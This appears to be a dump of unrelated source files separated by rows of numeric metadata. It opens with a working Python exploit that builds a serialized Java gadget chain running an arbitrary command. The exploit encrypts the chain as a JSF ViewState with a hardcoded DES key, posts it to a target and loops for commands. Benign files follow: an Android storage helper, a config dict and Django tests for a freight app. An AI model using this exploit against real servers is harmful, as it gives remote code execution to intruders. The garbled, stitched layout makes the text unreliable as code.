payload += b'\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x35\x74\x00\x18\x43\x6f\x6d\x6d\x6f\x6e\x73\x43\x6f\x6c\x6c\x65\x63\x74\x69'
payload += b'\x6f\x6e\x73\x35\x2e\x6a\x61\x76\x61\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x70\x70\x73\x71\x00\x7e\x00\x0b\x01'
payload += b'\x00\x00\x00\x33\x71\x00\x7e\x00\x0d\x71\x00\x7e\x00\x0e\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x10\x70\x70\x73\x71\x00\x7e'
payload += b'\x00\x0b\x01\x00\x00\x00\x22\x71\x00\x7e\x00\x0d\x74\x00\x19\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x47\x65\x6e\x65\x72'
payload += b'\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x14\x47\x65\x6e\x65\x72\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x2e\x6a'
payload += b'\x61\x76\x61\x74\x00\x04\x6d\x61\x69\x6e\x70\x70\x73\x72\x00\x1f\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c'
payload += b'\x65\x63\x74\x69\x6f\x6e\x73\x24\x45\x6d\x70\x74\x79\x4c\x69\x73\x74\x7a\xb8\x17\xb4\x3c\xa7\x9e\xde\x02\x00\x00\x78\x70'
payload += b'\x78\x73\x72\x00\x34\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63'
payload += b'\x74\x69\x6f\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79\x8a\xad\xd2'
payload += b'\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c\x00\x03\x6b\x65\x79\x71\x00\x7e\x00\x01\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c\x6a'
payload += b'\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61'
payload += b'\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e'
payload += b'\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00'
payload += b'\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f'
payload += b'\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68'
payload += b'\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73'
payload += b'\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01'
payload += b'\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68'
payload += b'\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72'
payload += b'\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73'
payload += b'\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8'
payload += b'\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d'
payload += b'\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73'
payload += b'\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69'
payload += b'\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e\x00\x01\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52'
payload += b'\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61'
payload += b'\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f'
payload += b'\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02'
payload += b'\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63'
payload += b'\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d'
payload += b'\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72'
payload += b'\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02'
payload += b'\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76'
payload += b'\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00'
payload += b'\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61'
payload += b'\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00'
payload += b'\x2f\x73\x71\x00\x7e\x00\x28\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x00\x74\x00'
payload += b'\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67'
payload += b'\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x2c\x73\x71\x00\x7e'
payload += b'\x00\x28\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9'
payload += b'\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00'
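# NOTE: the serialized Java string is length-prefixed; the high byte of the
# two-byte big-endian length is the trailing \x00 above, and the next line
# supplies the low byte. chr(n).encode() yields two bytes once n >= 128,
# which would corrupt the stream, so cmd must stay under 128 characters.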
payload += (chr(len(cmd))).encode()
payload += cmd.encode()
payload += b'\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x01'
payload += b'\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x24\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67'
payload += b'\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e'
payload += b'\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72'
payload += b'\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02'
payload += b'\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00'
payload += b'\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78'
return encrypt_payload(payload)
def encrypt_payload(payload):
key = b64decode("SnNGOTg3Ni0=")
obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
enc = obj.encrypt(payload)
hash_val = (hmac.new(key, bytes(enc), sha1).digest())
payload = enc + hash_val
return b64encode(payload)
def decrypt_view_state(view_state):
key = b64decode("SnNGOTg3Ni0=")
obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
view_state = b64decode(view_state)
dec = obj.decrypt(view_state)
return dec
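# Hypothetical self-test (an assumption, not part of the original exploit):
# round-trips a blob through the same hardcoded DES key to confirm
# encrypt_payload's layout of DES-ECB ciphertext plus a 20-byte HMAC-SHA1 tag.
def verify_round_trip(data: bytes) -> bool:
    key = b64decode("SnNGOTg3Ni0=")
    blob = b64decode(encrypt_payload(data))
    enc, tag = blob[:-20], blob[-20:]
    if hmac.new(key, enc, sha1).digest() != tag:
        return False
    obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    return obj.decrypt(enc) == data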
def exploit(cmd):
view_state = create_payload(cmd)
data = {"javax.faces.ViewState": view_state }
r = requests.post(URL, data=data)
terminal = Terminal()
terminal.cmdloop()
| 78.854015
| 138
| 0.700454
| 2,337
| 10,803
| 3.227642
| 0.111254
| 0.07318
| 0.047726
| 0.041363
| 0.569137
| 0.496487
| 0.4477
| 0.409784
| 0.392417
| 0.326793
| 0
| 0.336492
| 0.07211
| 10,803
| 136
| 139
| 79.433824
| 0.416002
| 0.027678
| 0
| 0.038462
| 0
| 0.653846
| 0.770176
| 0.763506
| 0
| 1
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.048077
| 0
| 0.144231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
30537e2b0b4244c8cb40feb6dfa76b19de5de850
| 25
|
py
|
Python
|
omnilingual/features/__init__.py
|
DennisMerkus/pyomnilingual
|
a25efc221c37a44d86f3a41cbd1c2786cd6f09bb
|
[
"MIT"
] | null | null | null |
omnilingual/features/__init__.py
|
DennisMerkus/pyomnilingual
|
a25efc221c37a44d86f3a41cbd1c2786cd6f09bb
|
[
"MIT"
] | null | null | null |
omnilingual/features/__init__.py
|
DennisMerkus/pyomnilingual
|
a25efc221c37a44d86f3a41cbd1c2786cd6f09bb
|
[
"MIT"
] | null | null | null |
from .universal import *
| 12.5
| 24
| 0.76
| 3
| 25
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2322dce8bd0be2fc0605863a4b6eb052af63d781
| 9,641
|
py
|
Python
|
orchestrator/src/mobiletestorchestrator/device_storage.py
|
jrusnakli/mobile_test_orchestrator
|
9dc21ed22798fc7587db538ca0e0a69d5664d03d
|
[
"BSD-2-Clause"
] | 1
|
2019-05-21T15:14:39.000Z
|
2019-05-21T15:14:39.000Z
|
orchestrator/src/mobiletestorchestrator/device_storage.py
|
jrusnakli/mobile_test_orchestrator
|
9dc21ed22798fc7587db538ca0e0a69d5664d03d
|
[
"BSD-2-Clause"
] | 17
|
2019-05-20T17:40:05.000Z
|
2021-07-25T23:13:13.000Z
|
orchestrator/src/mobiletestorchestrator/device_storage.py
|
jrusnakli/mobile_test_orchestrator
|
9dc21ed22798fc7587db538ca0e0a69d5664d03d
|
[
"BSD-2-Clause"
] | 7
|
2019-05-22T21:02:10.000Z
|
2020-08-06T23:56:23.000Z
|
"""
The *devicestorage* package provides the API for working with a device's (sdcard) storage
"""
import logging
import os
import subprocess
from typing import Optional, List, AsyncIterable
from .device import (
Device,
RemoteDeviceBased,
)
__all__ = ["DeviceStorage", "AsyncDeviceStorage"]
log = logging.getLogger(__name__)
class DeviceStorage(RemoteDeviceBased):
"""
Class providing API to push, pull and remove files on a remote device
:param device: which device
"""
ERROR_MSG_INSUFFICIENT_STORAGE = "INSTALL_FAILED_INSUFFICIENT_STORAGE"
def __init__(self, device: Device):
super(DeviceStorage, self).__init__(device)
self._ext_storage = None
@property
def external_storage_location(self) -> str:
"""
:return: location on remote device of external storage
"""
return self.device.external_storage_location
def list(self, remote_path: str) -> List[str]:
"""
list the files at the given path (which can be a filename pattern)
:param remote_path: path or pattern to match
:return: List of files found, empty if no files found
"""
try:
proc = self.device.execute_remote_cmd("shell", "ls", remote_path, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except Device.CommandExecutionFailure:
return []
return proc.stdout.split()
def push(self, local_path: str, remote_path: str) -> None:
"""
Push a local file to the given location on the remote device.
NOTE: pushing to an app's data directory is not possible and leads to
a permission-denied response even when using "run-as"
:param local_path: path to local host file
:param remote_path: path to place file on the remote device
:raises FileNotFoundError: if the provided local path does not exist or is not a file
:raises `Device.CommandExecutionFailure`: if command to push file failed
"""
# NOTE: pushing to an app's data directory is not possible and leads to
# a permission-denied response even when using "run-as"
if not os.path.isfile(local_path):
raise FileNotFoundError("No such file found: %s" % local_path)
self.device.execute_remote_cmd('push', local_path, remote_path)
def pull(self, remote_path: str, local_path: str, run_as: Optional[str] = None) -> None:
"""
Pull a file from device
:param remote_path: location on phone to pull file from
:param local_path: path to file to be created from content from device
:param run_as: user to run command under on remote device, or None
:raises FileExistsError: if the local path already exists
:raises `Device.CommandExecutionFailure`: if command to pull file failed
"""
if os.path.exists(local_path):
log.warning("File %s already exists when pulling. Potential to overwrite files.", local_path)
if run_as:
with open(local_path, 'w') as out:
self.device.execute_remote_cmd('shell', 'run-as', run_as, 'cat', remote_path, stdout=out)
else:
self.device.execute_remote_cmd('pull', remote_path, local_path)
def make_dir(self, path: str, run_as: Optional[str] = None) -> None:
"""
make a directory on remote device
:param path: path to create
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailure`: on failure to create directory
"""
if run_as:
self.device.execute_remote_cmd("shell", "run-as", run_as, "mkdir", "-p", path,
timeout=Device.TIMEOUT_ADB_CMD)
else:
self.device.execute_remote_cmd("shell", "mkdir", "-p", path)
def remove(self, path: str, recursive: bool = False, run_as: Optional[str] = None) -> None:
"""
remove a file or directory from remote device
:param path: path to remove
:param recursive: if True and path is a directory, recursively remove all contents; otherwise a
`Device.CommandExecutionFailure` exception is raised
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailure`: on failure to remove the specified path
"""
cmd = ["shell", "run-as", run_as, "rm"] if run_as else ["shell", "rm"]
if recursive:
cmd.append("-r")
cmd.append(path)
self.device.execute_remote_cmd(*cmd, timeout=Device.TIMEOUT_LONG_ADB_CMD)
class AsyncDeviceStorage(RemoteDeviceBased):
"""
Class providing API to push, pull and remove files on a remote device
:param device: which device
"""
ERROR_MSG_INSUFFICIENT_STORAGE = "INSTALL_FAILED_INSUFFICIENT_STORAGE"
def __init__(self, device: Device):
super(AsyncDeviceStorage, self).__init__(device)
self._ext_storage = None
@property
def external_storage_location(self) -> str:
"""
:return: location on remote device of external storage
"""
return self.device.external_storage_location
async def list(self, remote_path: str, timeout: float = Device.TIMEOUT_ADB_CMD) -> AsyncIterable[str]:
"""
list the files at the given path (which can be a filename pattern)
:param remote_path: path or pattern to match
:return: async iterator over the files found (yields nothing if no files found)
"""
async with self.device.monitor_remote_cmd("shell", "ls", remote_path, include_stderr=False) as proc:
async for line in proc.output(unresponsive_timeout=timeout):
yield line
async def push(self, local_path: str, remote_path: str,
timeout: Optional[float]=Device.TIMEOUT_LONG_ADB_CMD) -> None:
"""
Push a local file to the given location on the remote device.
NOTE: pushing to an app's data directory is not possible and leads to
a permission-denied response even when using "run-as"
:param local_path: path to local host file
:param remote_path: path to place file on the remote device
:param timeout: raise a timeout error if the command takes too long to execute
:raises FileNotFoundError: if the provided local path does not exist or is not a file
:raises `Device.CommandExecutionFailure`: if command to push file failed
:raises asyncio.TimeoutError: if a timeout is specified and command execution exceeds it
"""
# NOTE: pushing to an app's data directory is not possible and leads to
# a permission-denied response even when using "run-as"
if not os.path.isfile(local_path):
raise FileNotFoundError("No such file found: %s" % local_path)
await self.device.execute_remote_cmd_async('push', local_path, remote_path, timeout=timeout)
async def pull(self, remote_path: str, local_path: str, run_as: Optional[str] = None) -> None:
"""
Pull a file from device
:param remote_path: location on phone to pull file from
:param local_path: path to file to be created from content from device
:param run_as: user to run command under on remote device, or None
:raises FileExistsError: if the local path already exists
:raises `Device.CommandExecutionFailure`: if command to pull file failed
"""
if os.path.exists(local_path):
log.warning("File %s already exists when pulling. Potential to overwrite files.", local_path)
if run_as:
with open(local_path, 'w') as out:
await self.device.execute_remote_cmd_async('shell', 'run-as', run_as, 'cat', remote_path, stdout=out)
else:
await self.device.execute_remote_cmd_async('pull', remote_path, local_path)
async def make_dir(self, path: str, run_as: Optional[str] = None) -> None:
"""
make a directory on remote device
:param path: path to create
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailure`: on failure to create directory
"""
if run_as:
await self.device.execute_remote_cmd_async("shell", "run-as", run_as, "mkdir", "-p", path,
timeout=Device.TIMEOUT_ADB_CMD)
else:
await self.device.execute_remote_cmd_async("shell", "mkdir", "-p", path)
async def remove(self, path: str, recursive: bool = False, run_as: Optional[str] = None) -> None:
"""
remove a file or directory from remote device
:param path: path to remove
:param recursive: if True and path is a directory, recursively remove all contents; otherwise a
`Device.CommandExecutionFailure` exception is raised
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailure`: on failure to remove the specified path
"""
cmd = ["shell", "run-as", run_as, "rm"] if run_as else ["shell", "rm"]
if recursive:
cmd.append("-r")
cmd.append(path)
await self.device.execute_remote_cmd_async(*cmd, timeout=Device.TIMEOUT_LONG_ADB_CMD)
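# Hypothetical usage sketch (assumes an already-connected Device instance;
# how Device is constructed is outside this module):
#
#   storage = DeviceStorage(device)
#   storage.make_dir("/sdcard/test_data")
#   storage.push("local/file.txt", "/sdcard/test_data/file.txt")
#   print(storage.list("/sdcard/test_data/*"))
#   storage.remove("/sdcard/test_data", recursive=True)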
| 42.471366
| 118
| 0.652629
| 1,264
| 9,641
| 4.845728
| 0.136076
| 0.027755
| 0.036082
| 0.048816
| 0.870694
| 0.851918
| 0.81502
| 0.799184
| 0.774857
| 0.74449
| 0
| 0
| 0.265221
| 9,641
| 227
| 119
| 42.471366
| 0.864625
| 0.248729
| 0
| 0.465116
| 0
| 0
| 0.090834
| 0.014418
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104651
| false
| 0
| 0.05814
| 0
| 0.255814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
234ccefa35c05191bcd78fef94da43c0c671994b
| 41
|
py
|
Python
|
torch_geometric/nn/acts.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 12,651
|
2017-10-28T15:14:24.000Z
|
2021-09-12T07:22:57.000Z
|
torch_geometric/nn/acts.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,472
|
2017-10-30T23:38:47.000Z
|
2021-09-12T06:41:44.000Z
|
torch_geometric/nn/acts.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,363
|
2017-12-01T13:25:05.000Z
|
2021-09-12T07:23:09.000Z
|
def swish(x):
return x * x.sigmoid()
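# swish(x) = x * sigmoid(x); for the common beta=1 case this is the same
# function recent PyTorch releases expose as torch.nn.functional.silu.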
| 13.666667
| 26
| 0.585366
| 7
| 41
| 3.428571
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.243902
| 41
| 2
| 27
| 20.5
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
2378c2549b75db43ae021635396faa3ea5a53876
| 53
|
py
|
Python
|
config.py
|
a-rozhkov/miprimer
|
04c6e7a3edc3bbc7f326513b9c057bf9b369ca2c
|
[
"MIT"
] | 15
|
2017-01-19T15:46:14.000Z
|
2020-05-17T09:40:14.000Z
|
config.py
|
a-rozhkov/miprimer
|
04c6e7a3edc3bbc7f326513b9c057bf9b369ca2c
|
[
"MIT"
] | null | null | null |
config.py
|
a-rozhkov/miprimer
|
04c6e7a3edc3bbc7f326513b9c057bf9b369ca2c
|
[
"MIT"
] | 1
|
2019-10-13T02:53:22.000Z
|
2019-10-13T02:53:22.000Z
|
config = {
'HOST': '0.0.0.0',
'PORT': 4242
}
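# Hypothetical usage (the consuming server code is not shown here):
#   app.run(host=config['HOST'], port=config['PORT'])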
| 10.6
| 22
| 0.415094
| 8
| 53
| 2.75
| 0.625
| 0.272727
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 0.301887
| 53
| 4
| 23
| 13.25
| 0.378378
| 0
| 0
| 0
| 0
| 0
| 0.283019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
88c6c1ed48822dd48efcb3dab58885ca39b34b48
| 19,920
|
py
|
Python
|
freight/tests/test_views.py
|
buahaha/aa-freight
|
69eb85188988d7cfaffc7c485d22ddb442a4a2b3
|
[
"MIT"
] | null | null | null |
freight/tests/test_views.py
|
buahaha/aa-freight
|
69eb85188988d7cfaffc7c485d22ddb442a4a2b3
|
[
"MIT"
] | null | null | null |
freight/tests/test_views.py
|
buahaha/aa-freight
|
69eb85188988d7cfaffc7c485d22ddb442a4a2b3
|
[
"MIT"
] | null | null | null |
import json
from unittest.mock import Mock, patch
from django.contrib.sessions.middleware import SessionMiddleware
from django.test import RequestFactory, TestCase
from django.urls import reverse
from esi.models import Token
from allianceauth.eveonline.models import EveCharacter
from allianceauth.tests.auth_utils import AuthUtils
from app_utils.testing import NoSocketsTestCase
from .. import views
from ..app_settings import (
FREIGHT_OPERATION_MODE_MY_ALLIANCE,
FREIGHT_OPERATION_MODE_MY_CORPORATION,
)
from ..models import Contract, ContractHandler, Location, Pricing
from . import DisconnectPricingSaveHandler, generate_token, store_as_Token
from .testdata import create_contract_handler_w_contracts
MODULE_PATH = "freight.views"
HTTP_OK = 200
HTTP_REDIRECT = 302
def response_content_to_str(content) -> str:
return content.decode("utf-8")
def json_response_to_python(response) -> object:
return json.loads(response_content_to_str(response.content))
def json_response_to_python_dict(response) -> dict:
return {x["id"]: x for x in json_response_to_python(response)}
class TestCalculator(NoSocketsTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts()
AuthUtils.add_permission_to_user_by_name("freight.use_calculator", cls.user)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
def test_index(self):
request = self.factory.get(reverse("freight:index"))
request.user = self.user
response = views.index(request)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:calculator"))
def test_calculator_access_with_permission(self):
request = self.factory.get(reverse("freight:calculator"))
request.user = self.user
response = views.calculator(request)
self.assertEqual(response.status_code, HTTP_OK)
def test_calculator_no_access_without_permission(self):
request = self.factory.get(reverse("freight:calculator"))
request.user = AuthUtils.create_user("Lex Luthor")
response = views.calculator(request)
self.assertNotEqual(response.status_code, HTTP_OK)
class TestContractList(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user_1 = create_contract_handler_w_contracts()
AuthUtils.add_permission_to_user_by_name("freight.basic_access", cls.user_1)
AuthUtils.add_permission_to_user_by_name("freight.use_calculator", cls.user_1)
AuthUtils.add_permission_to_user_by_name("freight.view_contracts", cls.user_1)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
cls.user_2 = AuthUtils.create_user("Lex Luthor")
AuthUtils.add_permission_to_user_by_name("freight.basic_access", cls.user_2)
def test_all_no_access_without_permission(self):
request = self.factory.get(reverse("freight:contract_list_all"))
request.user = self.user_2
response = views.contract_list_all(request)
self.assertNotEqual(response.status_code, HTTP_OK)
def test_should_return_all_contracts(self):
# given
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ALL})
)
request.user = self.user_1
# when
response = views.contract_list_data(request, views.CONTRACT_LIST_ALL)
# then
all_contract_ids = set(Contract.objects.values_list("contract_id", flat=True))
contract_ids_in_response = {
obj["contract_id"] for obj in json_response_to_python(response)
}
self.assertSetEqual(contract_ids_in_response, all_contract_ids)
# TODO
""" issue with setting permission
def test_active_access_with_permission(self):
request = self.factory.get(reverse('freight:contract_list_active'))
request.user = self.user_1
response = views.contract_list_active(request)
self.assertEqual(response.status_code, HTTP_OK)
"""
def test_active_data_has_all_contracts(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ACTIVE})
)
request.user = self.user_1
response = views.contract_list_data(request, views.CONTRACT_LIST_ACTIVE)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
contract_ids = {x["contract_id"] for x in data}
self.assertSetEqual(
contract_ids,
{
149409005,
149409014,
149409006,
149409015,
149409016,
149409064,
149409061,
149409062,
149409063,
149409017,
149409018,
149409019,
},
)
def test_data_invalid_category(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={"this_is_not_valid"})
)
request.user = self.user_1
with self.assertRaises(ValueError):
views.contract_list_data(request, "this_is_not_valid")
def test_user_no_access_without_permission(self):
request = self.factory.get(reverse("freight:contract_list_user"))
request.user = self.user_2
response = views.contract_list_user(request)
